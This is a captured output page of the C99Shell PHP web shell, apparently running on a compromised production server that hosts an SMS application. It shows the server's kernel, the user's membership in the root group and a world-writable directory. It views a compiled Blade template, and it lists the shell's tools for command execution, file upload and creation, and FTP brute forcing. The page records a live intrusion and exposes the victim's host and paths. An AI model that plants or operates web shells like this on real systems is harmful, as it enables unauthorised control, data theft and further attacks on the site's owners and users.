!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.27 GB of 117.98 GB (23.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     455fb7237d9e5adca75216b79bf9d795.php (1.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="word"><?php echo app('translator')->get('customer.title'); ?> *</label>
    <input <?php echo e(isset($label) && $label->title=='new'?'readonly':''); ?> value="<?php echo e(isset($label) && $label->title?$label->title:old('title')); ?>" type="text" name="title"
           class="form-control" id="word"
           placeholder="<?php echo app('translator')->get('Label Title'); ?>">
</div>

<div class="row">
    <div class="form-group col-sm-6">
        <label for="opt_type"><?php echo e(trans('customer.status')); ?></label>
        <select name="status" class="form-control" id="">
            <option <?php echo e(isset($label) && $label->status=='active'?'selected':''); ?> value="active"><?php echo e(trans('customer.active')); ?></option>
            <option <?php echo e(isset($label) && $label->status=='inactive'?'selected':''); ?> value="inactive"><?php echo e(trans('customer.inactive')); ?></option>
        </select>

    </div>
    <div class="col-sm-6">
        <label for="">Color  <?php if(isset($label) && isset($label->color)): ?> <button class="btn disabled" disabled="disabled" style="padding: 0px 20px; background: <?php echo e($label->color); ?>">&nbsp;&nbsp;&nbsp;</button> <?php endif; ?></label>
        <input type="color" class="form-control" value="<?php echo e(isset($label) && isset($label->color)?$label->color:''); ?>" name="color">

    </div>
</div>

<?php /**PATH /home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/label/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--